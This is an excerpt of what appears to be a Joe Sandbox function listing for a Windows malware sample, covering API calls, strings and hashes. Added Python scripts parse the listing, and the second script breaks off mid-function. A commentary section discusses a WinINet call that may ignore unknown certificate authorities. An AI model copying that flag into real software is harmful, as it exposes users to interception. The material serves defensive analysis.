                                                                                                                                                                          • Part of subcall function 00280413: __onexit.LIBCMT ref: 00280419
                                                                                                                                                                        Strings
                                                                                                                                                                        • InitializeConditionVariable, xrefs: 002804B8
                                                                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00280492
                                                                                                                                                                        • SleepConditionVariableCS, xrefs: 002804C4
                                                                                                                                                                        • kernel32.dll, xrefs: 002804A3
                                                                                                                                                                        • WakeAllConditionVariable, xrefs: 002804D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                        • API String ID: 66158676-1714406822
                                                                                                                                                                        • Opcode ID: e29bb8517c699615a4db0a44ffe571ac4ac3a0e8f94512e822c2df019f49e804
                                                                                                                                                                        • Instruction ID: fc0c41371c37c0aca5e14c84876da247f2f2fa4bcd6a32d02d6981a8a2c9a204
                                                                                                                                                                        • Opcode Fuzzy Hash: e29bb8517c699615a4db0a44ffe571ac4ac3a0e8f94512e822c2df019f49e804
                                                                                                                                                                        • Instruction Fuzzy Hash: 7121263AA527056BD7623BA4AC9ABAA7399EB05BB1F040125F905932C0DF748C058F70
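At this depth in the report (several thousand lines of per-function listings), the "APIs" and "Strings" bullets are easier to triage programmatically than by eye: which modules a function touches, which calls are the function's own versus attributed to a subcall, and which exports are resolved at run time through GetProcAddress with a literal name. The following Python is an added example, not part of the Joe Sandbox report or of the sample's code. The embedded input is a constructed sample whose lines are copied from the drag-and-drop handler and the CRT statics-initialiser entries above; the regular expressions assume the bullet layout shown on this page (an assumption, since the report format is not formally specified).

```python
"""Parse the per-function 'APIs' / 'Strings' bullets of a Joe Sandbox function listing."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: lines copied from the function listings on this page.
SAMPLE = """\
APIs
  • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
• DragQueryPoint.SHELL32(?,?), ref: 002F9BA3
• SendMessageW.USER32(?,000000B0,?,?), ref: 002F9C0C
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002F9C17
• DragFinish.SHELL32(?), ref: 002F9CDA
• DefDlgProcW.USER32(?,00000233,?,00000000), ref: 002F9DCD
Strings
Memory Dump Source
APIs
• __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00280436
  • Part of subcall function 0028045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002A2733,000000FF), ref: 002804A8
  • Part of subcall function 0028045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 002804BE
• ___scrt_fastfail.LIBCMT ref: 00280457
Strings
• InitializeConditionVariable, xrefs: 002804B8
• kernel32.dll, xrefs: 002804A3
"""

# Bullet layout as it appears on this page (assumed, not a documented grammar):
#   • [Part of subcall function XXXXXXXX: ]Name.MODULE[(args)], ref: XXXXXXXX
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
#   • text, xrefs: XXXXXXXX
STR_RE = re.compile(r"^\s*•\s*(?P<text>.+?),\s*xrefs:\s*(?P<ref>[0-9A-F]{8})\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int
    subcall: Optional[int]  # callee address when the report attributes the call to a subcall


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (text, xref address)


def parse_listing(text: str) -> list:
    """Split the listing into one FunctionEntry per 'APIs' header."""
    entries, current, section = [], None, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionEntry()
            entries.append(current)
            section = "apis"
            continue
        if stripped == "Strings":
            section = "strings"
            continue
        if stripped == "Memory Dump Source":
            section = None  # metadata block; nothing further to parse for this entry
            continue
        if current is None or section is None:
            continue
        if section == "apis":
            m = API_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] else []
                sub = int(m["sub"], 16) if m["sub"] else None
                current.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
        else:
            m = STR_RE.match(line)
            if m:
                current.strings.append((m["text"], int(m["ref"], 16)))
    return entries


def module_histogram(entries: list) -> Counter:
    """How many listed calls land in each module (USER32, SHELL32, KERNEL32, ...)."""
    return Counter(a.module for e in entries for a in e.apis)


def direct_calls(entries: list) -> list:
    """API names the functions call themselves, excluding subcall attributions."""
    return sorted({a.name for e in entries for a in e.apis if a.subcall is None})


def dynamic_resolution(entries: list) -> list:
    """Export names passed as a literal second argument to GetProcAddress."""
    return [a.args[1] for e in entries for a in e.apis
            if a.name == "GetProcAddress" and len(a.args) >= 2 and a.args[1] not in ("?", "00000000")]


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    print(module_histogram(parsed))
    print(direct_calls(parsed))
    print(dynamic_resolution(parsed))
```

Run over a whole exported report, the module histogram separates ordinary runtime and GUI scaffolding (the CRT initialiser resolving condition-variable exports from kernel32.dll) from the functions worth opening in a disassembler.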
                                                                                                                                                                        APIs
                                                                                                                                                                        • CharLowerBuffW.USER32(00000000,00000000,002FDCD0), ref: 002D4F6C
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D4F80
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D4FDE
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D5039
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D5084
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D50EC
                                                                                                                                                                          • Part of subcall function 0027FD52: _wcslen.LIBCMT ref: 0027FD5D
                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?,00327C10,00000061), ref: 002D5188
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                        • API String ID: 2055661098-1000479233
                                                                                                                                                                        • Opcode ID: caf2100682950bb7762d0d9762f45bcfb2a5956718ade6b7632d631c942a723b
                                                                                                                                                                        • Instruction ID: b192d2108901760060973fea50e0cd92b88ac06bf06e1813f0452a93e4fb93bc
                                                                                                                                                                        • Opcode Fuzzy Hash: caf2100682950bb7762d0d9762f45bcfb2a5956718ade6b7632d631c942a723b
                                                                                                                                                                        • Instruction Fuzzy Hash: 8BB1D7316287229FC710EF28C890A6AB7E5BF94714F50491EF596C7391D7B0DCA4CB92
APIs
• _wcslen.LIBCMT ref: 002EBBF8
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002EBC10
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002EBC34
• _wcslen.LIBCMT ref: 002EBC60
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002EBC74
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002EBC96
• _wcslen.LIBCMT ref: 002EBD92
  • Part of subcall function 002D0F4E: GetStdHandle.KERNEL32(000000F6), ref: 002D0F6D
• _wcslen.LIBCMT ref: 002EBDAB
• _wcslen.LIBCMT ref: 002EBDC6
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002EBE16
• GetLastError.KERNEL32(00000000), ref: 002EBE67
• CloseHandle.KERNEL32(?), ref: 002EBE99
• CloseHandle.KERNEL32(00000000), ref: 002EBEAA
• CloseHandle.KERNEL32(00000000), ref: 002EBEBC
• CloseHandle.KERNEL32(00000000), ref: 002EBECE
• CloseHandle.KERNEL32(?), ref: 002EBF43
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
• String ID:
• API String ID: 2178637699-0
• Opcode ID: e1a691c8a4112b8788f9b823ea3096ae42d94af48d97e11d4c79dd1ecaed2211
• Instruction ID: 5367b27bed894bd3d03a0cb66c14da2231cac011dec465810d7c8b99839dea56
• Opcode Fuzzy Hash: e1a691c8a4112b8788f9b823ea3096ae42d94af48d97e11d4c79dd1ecaed2211
• Instruction Fuzzy Hash: 25F1E0315283419FC715EF25C891B6BBBE5AF85310F18855EF8894B2A2CB70EC60CF92
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,002FDCD0), ref: 002E4B18
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002E4B2A
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,002FDCD0), ref: 002E4B4F
• FreeLibrary.KERNEL32(00000000,?,002FDCD0), ref: 002E4B9B
• StringFromGUID2.OLE32(?,?,00000028,?,002FDCD0), ref: 002E4C05
• SysFreeString.OLEAUT32(00000009), ref: 002E4CBF
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002E4D25
• SysFreeString.OLEAUT32(?), ref: 002E4D4F
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 354098117-199464113
• Opcode ID: 756284c91563de9957186cb17ce5e34be9e7fdb730285122791915d55d7a7617
• Instruction ID: 73f53c78f8e610254d6014871a932981905b84895369015f8ff60522de26c1c5
• Opcode Fuzzy Hash: 756284c91563de9957186cb17ce5e34be9e7fdb730285122791915d55d7a7617
• Instruction Fuzzy Hash: DE127E71A10145EFCB14DF55C888EAEB7B5FF45718F648098F8099B251D731ED52CBA0
APIs
• GetMenuItemCount.USER32(003329C0), ref: 002A3F72
• GetMenuItemCount.USER32(003329C0), ref: 002A4022
• GetCursorPos.USER32(?), ref: 002A4066
• SetForegroundWindow.USER32(00000000), ref: 002A406F
• TrackPopupMenuEx.USER32(003329C0,00000000,?,00000000,00000000,00000000), ref: 002A4082
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002A408E
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 36266755-4108050209
• Opcode ID: d3f787031323436ddff2a81b6fc2bb24353c5f5ae9296e1a74daba8e29e99922
• Instruction ID: 2c9e6f70dcd27ee1669353168228cbb6478b7a843e2e4a5e300451eb2e37452d
• Opcode Fuzzy Hash: d3f787031323436ddff2a81b6fc2bb24353c5f5ae9296e1a74daba8e29e99922
• Instruction Fuzzy Hash: 4C71F630664206BFEB21DF68DC49FAAFF69FF06364F200216F614A61D1CBB19960DB50
APIs
• DestroyWindow.USER32(00000000,?), ref: 002F7823
  • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002F7897
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002F78B9
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002F78CC
• DestroyWindow.USER32(?), ref: 002F78ED
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00260000,00000000), ref: 002F791C
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002F7935
• GetDesktopWindow.USER32 ref: 002F794E
• GetWindowRect.USER32(00000000), ref: 002F7955
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002F796D
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002F7985
  • Part of subcall function 00262234: GetWindowLongW.USER32(?,000000EB), ref: 00262242
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
• String ID: 0$tooltips_class32
• API String ID: 2429346358-3619404913
• Opcode ID: 3c61320d4d1f1bad4e15ccf70c021c3c6667690fc0f96153ab019d28379d4f8b
• Instruction ID: f980362d3dbe334463c258a616585e7395f1f56351693b753901920645ec92a8
• Opcode Fuzzy Hash: 3c61320d4d1f1bad4e15ccf70c021c3c6667690fc0f96153ab019d28379d4f8b
• Instruction Fuzzy Hash: 34718870514249AFD721DF18DC48F7AFBE9EB8A380F54042DFA8587261C7B0A966DB11
APIs
  • Part of subcall function 00261802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00261488,?,00000000,?,?,?,?,0026145A,00000000,?), ref: 00261865
• DestroyWindow.USER32(?), ref: 00261521
• KillTimer.USER32(00000000,?,?,?,?,0026145A,00000000,?), ref: 002615BB
• DestroyAcceleratorTable.USER32(00000000), ref: 002A29B4
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0026145A,00000000,?), ref: 002A29E2
• ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0026145A,00000000,?), ref: 002A29F9
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0026145A,00000000), ref: 002A2A15
• DeleteObject.GDI32(00000000), ref: 002A2A27
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                        • String ID: <)3
                                                                                                                                                                        • API String ID: 641708696-698759963
                                                                                                                                                                        • Opcode ID: cf0964b2849598c127df29d43cb1e10d5b7b1d4651708291502e7a22ee726610
                                                                                                                                                                        • Instruction ID: 066905cef25f73e87592dce72fdac0ffc7351ffa88dd37fe8d38659a3ecf5da5
                                                                                                                                                                        • Opcode Fuzzy Hash: cf0964b2849598c127df29d43cb1e10d5b7b1d4651708291502e7a22ee726610
                                                                                                                                                                        • Instruction Fuzzy Hash: 63613931521712DFDB269F18D988B2AB7B6FB81322F588518E44397660CB74B8B4DB40
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002DCEF5
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 002DCF08
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 002DCF1C
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002DCF35
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 002DCF78
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002DCF8E
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002DCF99
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002DCFC9
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 002DD021
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 002DD035
• InternetCloseHandle.WININET(00000000), ref: 002DD040
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
• String ID:
• API String ID: 3800310941-3916222277
• Opcode ID: f24d7bf89f079dc394115dc1a857f6a2515a011a54efdac9d4e0543b3d301633
• Instruction ID: 2f301a7c220bc27a968e15c80723e1c996f40770f3c1600b99b4da7404ba7bfa
• Opcode Fuzzy Hash: f24d7bf89f079dc394115dc1a857f6a2515a011a54efdac9d4e0543b3d301633
• Instruction Fuzzy Hash: B7519BB1510606BFDB219F60DC88ABBBBBDFF48395F10842AF94586250D734ED15EBA0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002F66D6,?,?), ref: 002F8FEE
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002F66D6,?,?,00000000,?), ref: 002F8FFE
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002F66D6,?,?,00000000,?), ref: 002F9009
• CloseHandle.KERNEL32(00000000,?,?,?,?,002F66D6,?,?,00000000,?), ref: 002F9016
• GlobalLock.KERNEL32(00000000), ref: 002F9024
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002F66D6,?,?,00000000,?), ref: 002F9033
• GlobalUnlock.KERNEL32(00000000), ref: 002F903C
• CloseHandle.KERNEL32(00000000,?,?,?,?,002F66D6,?,?,00000000,?), ref: 002F9043
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002F66D6,?,?,00000000,?), ref: 002F9054
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00300C04,?), ref: 002F906D
• GlobalFree.KERNEL32(00000000), ref: 002F907D
• GetObjectW.GDI32(00000000,00000018,?), ref: 002F909D
• CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 002F90CD
• DeleteObject.GDI32(00000000), ref: 002F90F5
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002F910B
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: 9a70c4939f26522333ea99db94d4af161bf18b0b88ecda12d512f10335a03b28
• Instruction ID: 3af2bc4154bac468eb16e88fb988258e0a4e3bd25b7b9026cd51841718878205
• Opcode Fuzzy Hash: 9a70c4939f26522333ea99db94d4af161bf18b0b88ecda12d512f10335a03b28
• Instruction Fuzzy Hash: 4C413A75600209BFDB119F65EC4CEBBBBB9EF897A1F104068FA05D7260DB709941DB60
APIs
  • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
  • Part of subcall function 002ED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002EC10E,?,?), ref: 002ED415
  • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED451
  • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4C8
  • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002EC154
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002EC1D2
• RegDeleteValueW.ADVAPI32(?,?), ref: 002EC26A
• RegCloseKey.ADVAPI32(?), ref: 002EC2DE
• RegCloseKey.ADVAPI32(?), ref: 002EC2FC
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 002EC352
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002EC364
• RegDeleteKeyW.ADVAPI32(?,?), ref: 002EC382
• FreeLibrary.KERNEL32(00000000), ref: 002EC3E3
• RegCloseKey.ADVAPI32(00000000), ref: 002EC3F4
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 146587525-4033151799
• Opcode ID: 69b582b7680075a2076199c7f2e14c8afc7499ed9a1fe67e863900ea95445fba
• Instruction ID: 3d4b3f6ca4ace78e22b907ed0d54bf7e12843327270776b202d257ad000bed60
• Opcode Fuzzy Hash: 69b582b7680075a2076199c7f2e14c8afc7499ed9a1fe67e863900ea95445fba
• Instruction Fuzzy Hash: BBC19E34224242AFD710DF55C494F2ABBE5BF84318F64849CF45A8B6A2CB71EC96CF91
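Two of the function blocks above deserve more than a glance when triaging a listing like this: the WinINet routine whose calls end at ref 002DD040, and the registry deletion routine whose calls end at ref 002EC3F4. In the first, InternetQueryOptionW and InternetSetOptionW are both called with option 0x1F, which is INTERNET_OPTION_SECURITY_FLAGS, and a buffer length of 4 (one DWORD); the value 0x100 shown in the lpBuffer slot equals SECURITY_FLAG_IGNORE_UNKNOWN_CA, but Joe Sandbox prints raw argument slots, so whether that slot holds the flags value or a pointer to it has to be confirmed in the memory dump before calling it a certificate-validation bypass. In the second, RegDeleteKeyExW (the variant that takes a KEY_WOW64_* view flag) is resolved by name through LoadLibraryA and GetProcAddress rather than imported, a common way to stay loadable on Windows versions that predate the export; the direct RegDeleteKeyW call in the same function is consistent with a fallback path. The script below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses the 'APIs' bullets in exactly the format shown on this page, decodes the public wininet.h constants named above, and flags the two patterns. The sample input is copied from the two report entries above; the constant values are from the Windows SDK; the tags and wording of the findings are the script's own.

```python
"""Triage helper for the 'APIs' blocks of a Joe Sandbox function listing.
Added example: not part of the Joe Sandbox report or of the analysed sample."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple, Union

Arg = Union[int, str, None]

# One 'APIs' bullet, with or without the 'Part of subcall function XXXXXXXX:' prefix.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Public Windows SDK values (wininet.h); the report itself prints only raw hex.
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAGS = {
    0x0080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x0100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x1000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x2000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}


@dataclass
class Call:
    name: str
    module: str
    args: List[Arg]
    ref: int                # address of the call site ('ref:')
    subcall: Optional[int]  # set when Joe marks it 'Part of subcall function'


def parse_arg(tok: str) -> Arg:
    """'?' = unresolved slot; 8 hex digits = constant or pointer; anything else a string."""
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok


def parse_blocks(text: str) -> List[List[Call]]:
    """One list of Calls per 'APIs' header; any other section header closes it."""
    blocks: List[List[Call]] = []
    current: Optional[List[Call]] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            blocks.append(current)
        elif current is None or not stripped:
            continue
        elif (m := API_RE.match(line)):
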